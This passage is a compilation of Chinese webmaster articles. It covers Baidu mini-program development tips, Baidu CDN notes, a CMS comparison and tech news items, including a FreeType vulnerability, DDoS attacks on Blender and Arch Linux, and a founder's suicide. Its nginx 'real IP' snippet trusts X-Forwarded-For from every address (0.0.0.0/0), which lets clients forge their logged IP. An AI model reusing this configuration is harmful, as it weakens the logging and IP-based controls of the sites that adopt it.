可以看到这个地方要求必须是https站点,有一些站长看到https可能就望而却步了,担心会在短期内对目前站点产生影响。但是这个地方需要配置的域名其实不是你h5站点或者pc站点的域名,而是一个你自己享有管理权的域名就可以了。所以并不存在所担心的https对目前站点产生影响的问题,不过担心这个问题的站长一定要注意如果你没有准备好给目前域名加装证书的话,那就不要装错了哦。 3. url映射问题 根据目前的小程序要求,貌似是除非写死,要不然就必须参数一一对应。 (比如像首页就是写死对应的。)那像一些伪静态规则中将末尾的参数,例如1542.html去掉了的站点来说,适配起来非常复杂了,必须调整小程序这边手动挨个挨个对应,程序猿估计会告诉你这个需求太难了我做不到,然而更改h5站点url也是一个不现实的问题。同时对于一些是建站公司外包建的h5站点来说,更是难上加难。作为运营或者seo或者管理层,最好是看下自身的h5站点有没有这个问题,项目一旦启动,责任就在肩膀上了。 4. 绑定or不绑定h5站点? 虽然说不绑定h5站点也没有什么问题,一样可以web化一样可以接入搜索一样会索引一样会给排名,只是不能继承h5站点的权重而已。大胆猜测这个绑定并做映射适配就和移动适配一样,做了适配肯定比不做适配要好,同时会像站长平台的改版一样,在搜索结果中替换原有的h5资源,还多了一个小程序加权。 比如你h5站点现在排名在第二页,可能适配了小程序,就直接继承权重再加上小程序加权,直接彪到首页了。但是如果你没有绑定h5站点,只有一个小程序,可能的结果就是你如果是h5站点,新上线,本来不给排名,但是有小程序加持,就给你排到了第五页或者是更靠后的一个排名,这个也可能就是很多站长说的,小程序有收录没有排名的原因。其实不是没有排名,是给你的加权没有办法把你带到你想要的高度。 所以从我个人的经验和思考来说,还是强烈建议大家做h5站点的绑定适配。 但是从另外一个角度来说,如果你是一个老站,权重比较高,对于一些暂时还看不清楚的事情还是慎重一点,毕竟小程序绑定h5不能解绑。(比如我现在就很想去掉熊掌号的那个icon,丑的不行) 而如果你的站点本身就是个新站,没什么权重没什么流量,你就完全没必要绑定没必要做适配了。身边也有单独做小程序没有绑定站点做的非常好的同行,当然,这个更多的是要看个人小程序的质量了。 5. 组件问题 在开发过程中,很多时候使用百度给出的组件就会出现白屏问题,使用三方插件就不会。那么问题来了:使用三方插件会导致速度变慢,而一些复杂站点的小程序的加载速度本身就已经很慢了……这点能也只能希望官方能多给出一些组件,同时站长们也适当的去掉一些复杂的功能,尽量使小程序简洁又利于用户体验,同时强烈建议图片放置于开启cdn的服务器,或者尝试第一屏后面的图片使用懒加载,毕竟首屏加载必须要在1.5s以内。 6. 小程序管理后台的卡顿问题 卡顿、数据消失、数据展现不及时等等,不要惊慌失措,遇到你的数据消失了的时候就刷新,或者再多等等,总会好的,不要急。(百度小程序还是个宝宝!你的要求不要那么高!) 7. 排名问题 最近有同行跟我说,接小程序外包的一些建站公司和优化公司基本都不接新单了,我一惊:难道小程序这么快就步入了熊掌号的后尘?! 显然小程序没凉,反而在不断优化不断改进,只是这帮江湖骗子们凉了。 小程序前期参与的人比较少,再加上流量倾斜,以及单卡的搜索直达当时还不是模糊匹配,造成大量并不具备专业优化能力的外包公司宣称做小程序就有排名,秒排,秒上首页。并且收取几千到几万不等的费用。实际上他们就是采用模板给你做了个小程序,相当于源码建站,可能连数据都没给你打通,甚至连搜索都没给你接入,就靠单卡和搜索直达忽悠你。 然而,随着小程序的更新,飓风算法打击了这些模板小程序,搜索直达和单卡显示等对小程序本身的质量也开始越来越注重。自然,这些垃圾小程序就凉了,骗子们的招数也就不灵了,新单也不敢接了。 但是百度小程序的权重加持是真的,流量倾斜是真的,端内大量流量派发也是真的,只是看你怎么玩了。可悲的是,我还没有捞到很多流量,自己也在一步一步的学习。 程序猿可能会遇到的一些bug和“灵异事件” 好了,下面我们的程序猿给大家分享一些开发中的bug以及一些灵异事件。公司程序猿在开发百度小程序时,还未接触过类似的产品,所以解决问题也只能靠自己摸索或者在网上找微信小程序有无遇到类似的问题,最后附上可能会遇到比较突出的问题和解决方法 1. 页面空白,但无报错信息 ps:由于我们是移植web站功能在小程序,所以很多样式都是直接套用web站样式,好快速开发,但是由于很多html标签是单标签 而小程序标签基本都是双标签,最典型的就是img>image标签,还有就是在写input标签时要特别注意结束标签,不写结束标签,会出现页面空白,但是没有明显报错 2. 一个灵异事件 在开发了小程序几个页面后,发现不能预览了 但是却没有发现那里有报错,由于比较赶时间,就暂时记录了,搁置在这里了。 结果到了发布时,懵了,发现发布也不能发布,报错信息->发布错误 上传失败 -1:500-undefined。 试了很多方法,这个错误好像是百度小程序独有的,查了微信小程序也没有找到类似问题,问了其他小伙伴,都不行,开发社区也有类似的问题,但是却没有人解答。 自己又尝试是否是包太大了,又删除部分包尝试,依然错误,检查appid也是正常,最后折腾了几个小时,还是不行,就把包打包,拿回家,准备第二天休息时继续尝试,找问题,结果第二天用自己电脑下载最新版本的开发工具,发布,成功发布,以为是开发工具版本问题时,过了一天由于审核失败,修改后准备重新提包时,问题又出现了,这次不管是最新的开发工具还是用自己的电脑时都不行了,结果想到在公司电脑都是用的公司网,回家用的自己家的网,然后自己开热点尝试发布,果不其然.成功发布。 这个问题暂时没有找到原因,难道说百度小程序发布会限制ip??这个问题也希望百度能够给个解答以解心有之惑,也有可能由于自己粗心没有看到.碰到同样问题的同学,要不要试试用你手机给电脑开热点来提包…… 3. 踩坑textarea组件 这个bug不是必现,有时候会出现, 开发者工具中placeholder 属性设置了无效,不显示,在手机上偶尔会出现穿透,输入框的焦点会跑到下面去,和别的模块重合,点击原来想输入的地方无效,因为输入焦点已经不在这里了,提交按钮也在原处,但是点击无效,因为也不知道移到哪里去了,应该是这个地方的所有东西都被下移了,解决方法是设置默认的 overflow 属性,更多问题,由于开发时间不长,并未测试到其他问题 4. 暂未解决问题 rich-text组件 用字符串方式 解析文本数据时,页面所有数据空白,没有报错,js里面也无法打印数据,所以暂未解决此问题,没有报错信息的问题很难解决,尤其是对我这样没有开发过小程序的小白,因为时间问题,暂时用bdparse插件渲染数据,但是由于插件会消耗部分性能,导致页面渲染速度有点问题,所以还是想找到问题用原生组件渲染数据 另外,我们的程序猿哥哥让我告诉大家:在遇到一些问题,搜不到百度小程序的相关回答时,可以尝试用微信小程序同样问题的解决方法,可能会对你有帮助。 原生开发小程序的的确确会有这样那样的问题,不过小程序是一个趋势,不跟上也许只能被淘汰。所以希望大家碰到问题就想办法解决问题,顺利上线自己的小程序! 作者:仙女,七叔 联系QQ:876305441 #### 开发者社区SegmentFault 因含VPN内容被要求停机整改 4月21日 消息:昨天,不少用户反馈开发者社区网站SegmentFault思否暂停服务,进入网站后提示“SegmentFault 服务暂时不可用,请稍后访问。” 对此,SegmentFault CEO在微博回应表示,思否社区因有部分用户发布了法律禁止的内容,被杭州市西湖区网警大队警告⚠要求停机两天进行整改,公司司技术合伙人此刻正在派出所被约谈接受相关处罚。做为一个小团队,公司也一直积极审查社区的内容,违规内容一旦发现也都是第一时间进行删除,难免有漏网之鱼。 目前,SegmentFault官方微博也发布公告表示,坚决禁止用户利用社区发布违规信息,但由于监管疏漏,还是出现了部分不合规内容。平台已被要求暂时停机整改,近期完成整改后会尽快恢复。 以下为官方回应内容: 尊敬的 SegmentFault 思否社区开发者: 您好!大家反馈的关于 SegmentFault 思否社区无法正常访问的问题我们已经收到。 自 2012 年社区上线以来,至今每月有上千万开发者通过 SegmentFault 分享技术内容,然而作为- -个小型创业团队,日益丰富的 UGC 内容也给我们的内容监管带来新的挑战。 SegmentFault 思否官方坚决禁止用户利用社区发布违法违规信息,也一直在投入技术和人力进行及时内容安全防控。但无奈由于监管疏漏,社区内还是出现了部分不合规的内容(VPN FQ 相关技术),我们被要求暂时停机整改,近期完成整改后会尽快恢复。我们深表歉意。 整改期间,我们会积极自查,完善内容安全机制,也呼吁大家合法合规地使用 SegmentFault 。共同守护这片技术交流的净土。 再次向您诚挚道歉。为了打造一-个纯粹的技术交流社区,我们一路深感不易,希望能够得到您的理解,可以继续- -如既往支持我们,我们将竭尽全力为各位开发者提供更加优质的技术内容!谢谢大家! 这里主机吧提醒大家千万别做VPN内容哦,即使教程也不行,对于这块,国内管理是相当严格的。 #### 开启反屏蔽的域名不能同时使用百度云加速了 刚刚从百度云加速了解到: 因业务整合,若同一主域名同时使用云加速服务和联盟反屏蔽服务,解析将会出现冲突,导致部分子域名解析失效,无法正常提供服务。因此,针对同一主域名,我们将暂不同时提供CDN加速与联盟反屏蔽服务。 也就是说域名你的域名A开了反屏蔽,那么A域名就不能同时使用百度云加速服务了。 想要解决这个办法,我们可以添加别的域名进行反屏蔽操作,设置只要不跟开通百度云加速的域名同一个主域名就行。 #### 开启百度云加速后怎么获取真实用户IP 正常情况下,开启CDN后,网站日志的请求IP就会都显示 CDN的节点,但有些客户是需要查看访问的真实IP,所以今天主机吧教大家如何获取真实用户IP。 百度云加速转发的HTTP头信息中增加 X-Forwarded-For 信息,用于记录客户端的真实IP,所以我们只要修改服务器配置就行, 比如nginx获取真实IP的方法: 原理:使用Nginx自带的Realip模块获取用户真实IP 修改nginx配置:http{}中添加如下: set_real_ip_from 0.0.0.0/0; real_ip_header X-Forwarded-For; 然后重载Nginx配置,完成! #### 开启百度云加速后网页自动加载cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js 最近看到有群友反馈网站开启百度云加速后网页自动加载一个cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js链接。 一看还怀疑是百度给网站偷偷加了广告呢?! 其实这是百度云加速的邮件地址混淆功能,可以防止垃圾邮件机器人自动抓取你网站的电子邮箱地址 。 如果你不喜欢,可以自己操作取消掉,操作方法,进入云加速安全功能--WAF-- 邮件地址混淆关掉即可。 #### 开启百度云加速导致网站支付出问题 最近遇到很多站长反馈开启百度云加速后,微信支付回调会有问题。目前这个问题是只有在开启https加速后才会有出现,官方正在紧急处理中,想要了解最新情况的可以咨询百度云加速企业QQ4008768800 #### 开放外链后 阿里旗下多个APP已接入微信支付 9月28日 消息:自从9月初,工信部要求腾讯阿里等解除屏蔽网址链接后,阿里和腾讯逐步开放外链,实现互联互通。 目前,更新到最新版微信的用户已经能够在微信聊天窗口中直接打开淘宝网首页,不过在跳转前页面会弹出一个“提示”,用户点击“继续访问”可打开网址。 此前,淘宝已在灰度测试银联云闪付。而目前,阿里旗下饿了么、优酷、大麦、考拉海购、书旗等应用均已接入微信支付。用户在确认下单的页面中,支付方式可选择微信支付。而淘特、闲鱼、盒马等App也已申请接入微信支付,正在等待微信审核。 #### 开源CMS系统哪个好?国内常见的三大建站系统对比! 如今使用CMS系统建站的站长是越来越多,国内常见的CMS有dedecms、PHPCMS、WordPress、帝国cms、5UCMS等,而目前使用最多的当属PHPCMS。对于不同的CMS系统侧重的方向也不同,是不是易上手,模板多不多,设置复杂不复杂,SEO效果怎么样,这些都是必须要搞清楚的问题。下面小编就带大家一起来分析对比一下国内常见的三大CMS系统。 Dedecms 目前国内用得最多的CMS了,没有之一。 安全性:dedecms的原团队被收购,柏拉图出走,接手织梦CMS的团队好像也不怎么上心,更新的频率基本维持在一年扎个尸的水平,直接导致了织梦的漏洞修复程度慢,若安全性做的不够严谨很容易被黑客入侵,两颗心★★☆☆☆。 模板丰富度:最为国内受欢迎的CMS,自然有着受欢迎的理由。模板程度异常发达,随意搜索模板就有几百、几千套。标签使用无比简单,不论是安装模板还是自行学习仿站,基本能满足我们的所有小心思,五颗星★★★★★。 上手简易度:新手友好度100%!后台参数布局合理,功能强大,操作简单,只需要简单的点点点,即可在3分钟内搭建出一个漂亮的个人网站,小到个人站/企业站,大到搭建商城、漫画等大型站点皆是不二之选,五颗星★★★★★。 参考资料:作为国内最受欢迎没有之一的CMS,已经被大家玩坏了!从百度指数到无数个织梦相关的精品站点,在实际使用网站中遇到的150%的问题都可以在搜索引擎中找到解决答案,简直是轻松的停不下来,五颗星★★★★★。 SEO:正因为其模板的发达程度,参考资料的无比丰富,SEO效果也是杠杠的,五颗星★★★★★。 总体评价:★★★★★ WordPress 来自国外的CMS系统,也是在国外异常发达的CMS市场中本土化最好的一款博客系统,据说市场份额在全球占50%,可见一斑。 安全性:得益于全球众多爱好者的不懈努力以及官方的不定时小更新,安全性上非常的高,毕竟如果出了大BUG,很可能全球部分网站都要瘫痪,五颗星★★★★★。 模板丰富度:既然是世界上最受欢迎的建站系统,模板当然也是一大堆,一大堆,一大堆,英文的,俄文的,日文的模板你随便挑!当然,国内的模板也是相当丰富,随意搜索都有超多的模板选择,四颗星★★★★☆。 上手简易度:越来越像CMS的博客系统,也导致了越来越臃肿,毕竟是老外开发的系统,在上手度上还是有一定的难度,初次使用的新手可能都不知道插件,主题是什么,而且改模板几乎是全PHP代码,更别提伪静态,缓存之类的各种设置了,两颗心★★☆☆☆。 参考资料:有着比帝国CMS还丰富的参考资料,有着众多的主题网站,大部分问题都可以在搜索引擎中找到答案,但是其修改的标准有些高,需要了解基础的HTML代码,服务器环境系统等导致了新手体验不是太好,三颗星★★★☆☆。 SEO:虽然越来越臃肿,但是不得不说WordPress依然是最受搜索引擎喜欢的CMS之一,百度都为wp推出了专门的数据化插件,而且越来越多的模板都是响应化设计,绝大部分主题自带SEO优化,五颗星★★★★★。 总体评价:★★★★☆ 推荐使用该系统,虽然其入门体验度有一些繁琐,但是胜在安全性非常高。对站长而言,也不想看到有一天网站流量做多了被入侵吧。 帝国CMS 非常老牌的CMS,就如同该CMS官网介绍的安全、强大、稳定、灵活。 安全性:高,姜就是老的辣,老牌的CMS就是靠谱,安全性四颗星★★★★☆。 模板丰富度:帝国CMS的模板与程序分离,在二次开发与模板设计上非常灵活,这样就决定着要对PHP有一点了解,标签的参数较为复杂,网络上的资源较为丰富,但是模板的导入导出功能对新手不太友好,同时扩展库也较为丰富,三颗星★★★☆☆。 上手简易度:帝国CMS后台设置参数较多,所有信息皆存储在数据库中,功能搭配上较为严谨,对新手来说需要一定的学习成本,三颗星★★★☆☆。 参考资料:不愧是老牌的CMS帝国,百度的搜索资料非常丰富,出了问题百度搜索很容易解决问题,五颗星★★★★★。 SEO:SEO的效果与程序的模板丰富度相关,帝国CMS的模板较为丰富,合适的模板也很多,想要调整成自己喜欢的模板要花一些心思了,四颗星。 总体评价:★★★★☆ 帝国CMS总体而言,功能太多对新手不是很友好,需要一定的学习成本,但是对有一些PHP基础的站长来说,简直是如鱼得水。 总之,无论是帝国CMS、WP、织梦还是其他CMS,任意一款程序都能满足我们的建站需求。不过,小编还是推荐大家使用dedecms,虽然其安全性较低,但是也有着很多安全性相关的参考文章,织梦对环境无任何要求,是台服务器就可以用,极大的降低学习成本,将更多的时间投入在内容和推广中去。 #### 开源Web UI解决方案layui官网将于10月13日下线 9月26日 消息:昨日, Web UI 解决方案layui宣布,官网将于 2021年10月13日 进行下线。届时,包括新版下载、文档和示例在内的所有框架日常维护工作,将全部迁移到 Github 和 Gitee。 layui表示,之后layui 仍会在代码托管平台所活跃,且2.7正式版也将在其间首发。对于 layuiAdmin 和 layim 专区,将会迁移到新站进行保留,以便老用户还能下载使用,但不再面向新用户。 资料显示,layui是一套开源的 Web UI 解决方案,由职业前端倾情打造,面向全层次的前后端开发者,易上手开源免费的 Web UI 组件库。 以下为 layui 公告全文: 所有对 layui 为之热爱、鞭策、奉献,和支持过的开发者: 请接受我用意念和字节传达的深深歉意。这是一个无力、无奈,甚至无助的决定: layui 官网将于 2021年10月13日 进行下线。 届时,包括新版下载、文档和示例在内的所有框架日常维护工作,将全部迁移到 Github 和 Gitee。 此后,layui 仍会在代码托管平台所活跃,且2.7正式版也将在其间首发。而 layui 官网将不复存在。 这不是终结,只是重归到开源的纯粹中来。 再者,对于 layuiAdmin 和 layim 专区,将会迁移到新站进行保留,以便老用户还能下载使用,且此二者不再面向新用户。 过去五年,layui 有幸被应用在不计其数的 Web 平台,在前端工程化迅速席来的浪潮中,我们仍然感受到一丝来自于 jQuery 的余晖,这是一种带有热量的冰冷(反之亦可)。使命已达,便纵有万般遗憾,更与何人说?! 最后,请大家怀揣对 Web 前端技术的热忱,去拥抱 Vue.js、拥抱 Element UI、拥抱更好的新时代, 以及,所有那些值得去追求的美好事物。 #### 开源中国获百度战略投资 将保持独立运营 12月6日 消息:据 36 氪消息,中文开源技术社区开源中国获得一笔来自百度的战略投资。开源中国称,此笔融资将用于引入更多开源技术人才,加大技术研发和升级基础设施,此后该公司将继续保持独立运营和发展。 据悉,此次合作,百度除了把开源深度学习平台飞桨入驻到Gitee外,其它百度系优秀开源产品也将陆续入驻。此外,开源中国还将从产品、运营等层面增进开源技术的推广和开源协作方式的改进。 开源中国成立于 2008 年,拥有超过 200 万会员,是目前国内最大的开源技术社区。其旗下的代码托管和协作开发平台gitee.com,是国内头部的代码托管平台和开发者生态,已有近 400 万开发者在Gitee托管了 600 多万代码仓库,托管代码量超过 3000 亿行,已积累超过 10 万家企业客户。 #### 开源内容管理系统 WordPress 诞生二十周年 5月30日 消息:开源内容管理系统 WordPress 在2023年5月27日迎来了它的二十周年诞辰,这标志着它已成为互联网上最受欢迎的网站构建和内容管理平台之一。 在2003年,Matt Mullenweg 和 Mike Little 一起创建了 WordPress,最初是一个简单的博客平台。随着时间的推移,WordPress 不断发展壮大,逐渐成为一个可定制、高度可扩展的内容管理系统,目前它已占据了全球网站的40% 以上的市场份额。 2004年1月,WordPress 发布了1.0版本,并开始了以音乐家的名字命名其主要版本的传统,1.0版本(Miles)是以美国小号手 Miles Davis 的名字命名。目前 WordPress 最新的大版本为6.0(Arturo),是以墨西哥爵士音乐家 Arturo O’Farrill 的名字命名,而最新的 WordPress6.2版本的下载次数已超过7900万次。 WordPress 的成功得益于它的开源和自由的本质。WordPress 的安装和使用非常简单,即使是没有编程经验的人也可以轻松上手。此外,WordPress 的插件和主题库是它的重要特色之一。用户可以自由地使用、修改和分发它的源代码,这使得它成为一个充满活力的社区,有数以万计的主题和插件可以供人们使用。这也是它成为许多人选择的理由之一。 二十年来,WordPress 一直在不断地发展和改进,为用户提供更易用、更功能丰富和更灵活的平台。2018年,WordPress 推出了名为 Gutenberg 的新编辑器,它采用了块编辑器的理念,使得用户可以更加方便地管理和编辑内容。 #### 开源压缩软件 PeaZip 9.0 版本发布:内存占用减少 10%,运行速度提升 10% 12 月 20 日消息,开源压缩软件 PeaZip 9.0 版本发布。新版本完成了从 PeaZip 8 开始的图形用户界面改进,提高了运行速度、减少了内存占用,并引入了很多重要改进。 现有用户可以访问“帮助”-》“检查更新”以自动下载和安装新版本。该版本也可以在项目的 GitHub 仓库中以独立版本的形式提供给所有支持的操作系统。 官方更新日志列出了 PeaZip 9.0 中的所有改进和变化。开发人员改进了应用程序的速度和内存使用,并在新版本中清理了遗留的代码。根据更新日志,PeaZip 9.0 打开 250K 项目的档案内存占用减少 10%,速度提高了 10%。数值因档案的大小而异,但处理大型档案的工作在资源上有了相当大的改善。 PeaZip 9 默认不支持 Windows 11 的现代右键菜单,但 Windows 11 用户可以相应文件夹中找到 REG 注册文件,以添加条目到现代右键菜单中。 新版本中完成了界面方面的调整,改进了对 7z、7zip 和 TAR 格式的支持。7-Zip 格式支持“不修改最后访问时间”、“不跟踪符号链接 / 硬链接”和“限制压缩期间的最大内存使用量”等选项。 #### 开源字体渲染库 FreeType 出现高危安全漏洞:可被黑客利用发起攻击 3 月 14 日消息,Facebook 旗下的安全研究实验室日前透露,FreeType 在 2.13.0 以前的版本中存在安全漏洞,该漏洞代号为 CVE-2025-27363,漏洞评分为 8.1/10 分,评级为高风险。 FreeType 是一款开源的字体渲染库,该渲染库可以将字符栅格化并映射成位图。Android、macOS 等操作系统及各种游戏引擎都有应用该字体渲染库。 该漏洞的详情如下: FreeType 2.13.0 及以下版本在解析 TrueType GX 和可变字体文件的字体子字形结构时存在越界写入漏洞。问题代码将有符号短整型数值赋给无符号长整型变量,随后叠加静态值导致数值回绕,进而分配过小的堆缓冲区。该漏洞允许在缓冲区外写入多达 6 个有符号长整型数值,可能引发任意代码执行。 虽然该漏洞已于 2023 年 2 月 9 日在 FreeType 2.13.0 中被修复,但鉴于目前仍有很多用户在使用旧版本的操作系统或软件,同时可能有黑客已经在利用该漏洞展开攻击,Facebook 建议所有用户将他们的系统或将 FreeType 单独更新到最新版本以避免可能的安全风险。 #### 开源建模软件 Blender 遭受严重 DDoS 攻击 CloudFlare也顶不住 11 月 24 日消息,开源建模软件 Blender 这几天多次遭受严重 DDoS 攻击,一度导致软件官网及部分服务崩溃。 在 Blender 网站上发布的公告中,公司首席运营官 Francesco Siddi 表示,这次 DDoS 攻击始于 11 月 18 日,攻击规模相当庞大,据称同时有超过 2.4 亿个针对该公司服务器的虚假请求。 Blender 最初试图通过封禁 DDoS 来源服务器的 IP 以试图屏蔽攻击,但黑客迅速切换了 IP,实行更大规模的攻击。 在 DDoS 事件发生四天后,Blender 将主网站转移到 CloudFlare,但仍然无法完全解决黑客 DDoS 问题,网站部分服务依然无法使用,用户也一度无法通过“blender.org”进入网站,只能通过 “www.blender.org”访问。 ▲ 黑客在当地时间 11 月 21 日进行的 DDoS 攻击流量图示 Blender 公司透露,黑客的身份或动机目前未知,相关团队也没有发布赎金要求。 安全公司 BleepingComputer 表示,黑客造成 Blender 网站崩溃,可能会迫使用户通过搜索引擎使用第三方网站寻找软件,这可能会使他们面临恶意软件的风险,实际上用户依然可以访问 Steam、GitHub 或 Microsoft Store 下载 Blender 软件。 #### 开源技术或迎来春天《关于规范金融业开源技术应用与发展的意见》发布 2021年9月28日,中国人民银行办公厅、中央网络安全和信息化委员会办公室秘书局、工业和信息化部办公厅、中国银行保险监督管理委员会办公厅、中国证券监督管理委员会办公厅发布《关于规范金融业开源技术应用与发展的意见》。 近年来,开源技术在金融业各领域得到广泛应用,在推动金融机构科技创新和数字化转型方面发挥着积极作用,但也面临安全可控等诸多挑战。为规范金融机构合理应用开源技术,提高应用水平和自主可控能力,促进开源技术健康可持续发展,现提出以下意见,请结合实际贯彻执行。一、本意见所指开源技术是金融机构从代码托管平台、技术社区、开源机构官方网站等渠道获取,或通过合作研发、商业采购等方式引入的开源代码、开源组件、开源软件和基于开源技术的云服务等。二、金融机构在使用开源技术时应遵循以下原则:(一)坚持安全可控。金融机构应当把保障信息系统安全作为使用开源技术的底线,认真开展事前技术评估和安全评估,堵塞安全漏洞,切实保证技术可持续和供应链安全,提升信息系统业务连续性水平。(二)坚持合规使用。金融机构应当遵循开源技术相关法律和许可要求,合规使用开源技术,明确开源技术的使用范围和使用的权利与义务,保障开源技术作者或权利人的合法权益。(三)坚持问题导向。鼓励金融机构有针对性地选择和使用开源技术,建立开源技术使用问题发现、反馈、解决等闭环机制,推动开源技术不断迭代升级。(四)坚持开放创新。鼓励金融机构重视开源技术应用与发展,积极参与国际国内开源技术社区建设,汲取先进技术,贡献中国智慧,培育适合金融场景的开源产业链,提升开源技术话语权。三、金融机构可以将开源技术应用纳入自身信息化发展规划,明确开源技术应用目标,制定开源技术应用工作方案并组织实施。四、鼓励金融机构加强对开源技术应用的组织管理和统筹协调,成立由科技、法务、采购等部门组成的开源技术应用协调机制,负责开源技术评估、选择、应用等工作,协调解决应用中遇到的困难和问题。五、鼓励金融机构建立健全开源技术应用管理制度体系,规范开源技术的引入审批、技术评估、合规使用、漏洞检测、更新维护、应急处置、停用退出等行为。六、金融机构可以根据金融业务场景,选择适宜的技术路线,制定合理的开源技术应用策略,包括独立完成开源技术应用及运维、引入第三方机构的开源技术支持服务、采购开源技术提供商的商业软件版本及服务等。七、金融机构可以根据开源技术使用情况,建立开源技术应用台账,及时掌握开源许可证变更、漏洞、闭源、停服等变化情况,实行常态化管理,规避风险。八、鼓励金融机构将开源技术应用作为提高核心技术自主可控能力的重要手段,加强开源技术研究储备,掌握开源技术核心,以应用促提升,依托金融业丰富的业务场景促进开源技术迭代升级。九、推动金融机构建立健全对开源技术基本功能、性能指标、安全性、社区成熟度、商业支持度、行业认可度等方面的评估体系,对开源技术引入、使用、更新、退出等环节开展定期评估,在提升自身评估能力的同时,可结合实际引入第三方评估服务。十、支持金融机构对开源技术版权、专利、商标、声明等进行事前合规审查,通过审查开源许可证遵从性和兼容性、梳理开源技术间依赖性等,避免法律纠纷。可根据需要引入第三方合规审查服务。 十一、支持金融机构制定应急处置预案,应对开源技术潜在漏洞、后门及闭源、停服等突发情况。通过规划备选方案、限制使用场景、储备核心技术人才等措施降低风险。及时更新应急处置预案,定期开展演练,保证应急处置预案的有效性。十二、支持金融机构加强开源技术供应链管理,保障开源技术产品和服务质量,通过合同或协议条款,明确开源技术提供商义务和责任,并要求开源技术提供商对其提供的开源技术进行技术评估、合规审查等。十三、鼓励金融机构积极参与开源生态建设,依法合规分享开源技术应用经验,共享开源技术研究成果。通过主动开源、贡献代码解决行业共性问题,提升开源技术整体应用水平。鼓励金融机构之间开展开源项目合作,实现优势互补、互利共赢、共同发展。十四、鼓励金融机构与科技企业、高等院校、科研院所、中介服务等机构加强交流合作,基于市场化原则开展开源技术联合研发和运营,加强开源技术人才培养,推进开源技术迭代升级,促进开源技术成果转化。十五、支持金融机构加入合法合规的开源社区、开源基金会等开源社会组织,参与开源技术规划设计、研发决策、社区运营等活动。开源社会组织发挥自律作用,研究出台自律公约,规范开源技术参与机构行为,保障开源技术贡献者合法权益。发挥桥梁纽带作用,建立稳定、高效的交流分享机制,定期开展开源技术交流、产金对接、应用推广等活动。十六、鼓励开源技术提供商加快提升技术创新能力,切实掌握开源技术核心代码,形成自主知识产权,夯实产业支撑能力。在提供基于开源技术的商业软件或服务时,遵循开源许可协议和相关法律法规要求,明确开源技术的使用范围和使用的权利与义务,保障用户合法权益。探索自主开源生态,重点在操作系统、数据库、中间件等基础软件领域和云计算、大数据、人工智能、区块链等新兴技术领域加快生态建设,利用开源模式加速推动信息技术创新发展。十七、人民银行、中央网信办、工业和信息化部、银保监会、证监会等部门加强统筹协调,建立跨部门协作配合、信息共享机制,定期召开跨部门协调会议,完善金融机构开源技术应用指导政策,推动金融机构合理规范使用开源技术。十八、探索建立开源技术公共服务平台,为金融机构识别开源技术风险、动态管理开源软件、持续跟踪开源前沿技术、共享开源发展动态信息、参与开源社区运营等提供专业化、定制化服务。推动金融机构开展开源技术成熟度评估,进行开源许可安全合规审查,建立开源技术选型评估模型,提升开源技术应用质量与效率。十九、加强开源技术及应用标准化建设,瞄准急需、重点领域加快标准制定与实施。加快推进开源技术应用和标准研究制定一体化。加强开源技术标准建设与信息化规划的衔接配套,推动金融业开源技术及应用高质量发展。二十、鼓励金融机构加强知识产权保护研究与宣传,提升知识产权保护意识,制定软件版权、专利、商标等开源技术知识产权保护策略和制度。依法合规使用开源技术,同时保障自身在使用开源技术、参与开源生态贡献中的合法权益。 #### 开源技术社区创业者陈智宏因压力过大自杀 年关将至,开源技术社区互联网创业者宏哥,原名陈智宏,因创业压力过大选择了轻生。 陈智宏在2010年注册成为开源中国社区会员,他一直以言辞犀利,观点鲜明,积极活跃的风格混迹在 OSC 的每个角落。他坚定不移、十年如一日的喷 Java 、喷 MySQL ,喷各种他觉得该喷的技术。 一直到了2019年的8月,陈智宏跟这位朋友说创业的公司可能要歇了,说他被一起创业的伙伴坑了。“最后一次是12月份,问能否来OSC上班,要没有今天的事,我一直以为他在跟我开玩笑。” “虽然,总共也就见了两三次面,但我跟这个同龄人非常聊得来,非常乐观开朗的人,那超感染力的笑声绝不可能是一个选择绝路的人。可是我错了。” 2019年8月,陈智宏甚至给这位朋友在微信上说,“如果我死了,在OSC上多说说我的好话。”当时对方还觉得是陈智宏胡说,“打死我也想不到会有这么一天。” 被曝出卖房给员工发工资 另据陈智宏的同学王林介绍,原本认为陈智宏是其同学中最能笑谈压力的人,他是一个技术极客,是其身边Linux玩得最好的人之一,也是连续创业者。 “他曾经给我说,一定要做出中国的Salesforce,要有自己的软件帝国,他是王兴的高中同学,他给我说,一定会把公司做到让王兴投资他。” 王林说,2019年10月,陈智宏还笑谈“开始卖房给员工发工资”,但谁也没有留意12月开始就没有他任何发言。在年关将近之际,他选择了离开这个世界,留下了尚在小学的儿子和没有工作的妻子。 陈智宏的微信的自我说明是,每前进一步,困难就越大,就越刺激。王林说,这样爱创业爱投资的人,爱家庭爱儿子的人,很难想象是什么样的压力最终压垮了他。 像陈智宏这种现象其实不在少数,主机吧曾经也是这么过来的,互联网创业压力其实比我们想象的大,可以说是易燃易爆炸。这里主机吧每一位互联网创业者一个忠告:不要把自己的所有都压在创业上,要学会给自己留条后路。   #### 开源社区的圣诞危机:Arch Linux官网再遭DDoS,IPv6成唯一“生命线” 事件概述:针对关键开源基础设施的“节日攻击” 2025年12月25日,西方传统圣诞假期期间,知名Linux发行版Arch Linux的官方网站遭遇大规模分布式拒绝服务攻击。此次攻击导致其官网在常规IPv4网络上完全不可用,项目团队被迫启用了一项非常规的应急措施:仅允许通过IPv6协议栈访问官网。目前,网站状态极不稳定,时而可访问,时而完全下线。 这已是Arch Linux在数月内第二次遭受重大DDoS攻击,上一次攻击使其关键的Arch User Repository(AUR) 社区软件仓库瘫痪。此次攻击时间点选择在技术支持资源普遍紧张的圣诞假期,进一步凸显了攻击的恶意性与针对性。 技术应对剖析:为何选择“仅IPv6”作为临时防线? 面对持续的DDoS洪流,Arch Linux团队与托管服务提供商采取的“禁用IPv4,仅保留IPv6”策略,是一项典型的攻击流量隔离与成本转移战术。 攻击流量隔离:绝大多数自动化DDoS攻击工具和僵尸网络仍主要依赖于IPv4地址空间进行发包。通过在其网络边界(如上游路由器、负载均衡器或Web服务器层面)直接丢弃所有IPv4流量,可以瞬间切断绝大部分攻击数据包的路径,无论其规模多大。这相当于在洪水面前,主动关闭了最大、最拥挤的那条河道(IPv4),只保留一条较小的备用通道(IPv6)。 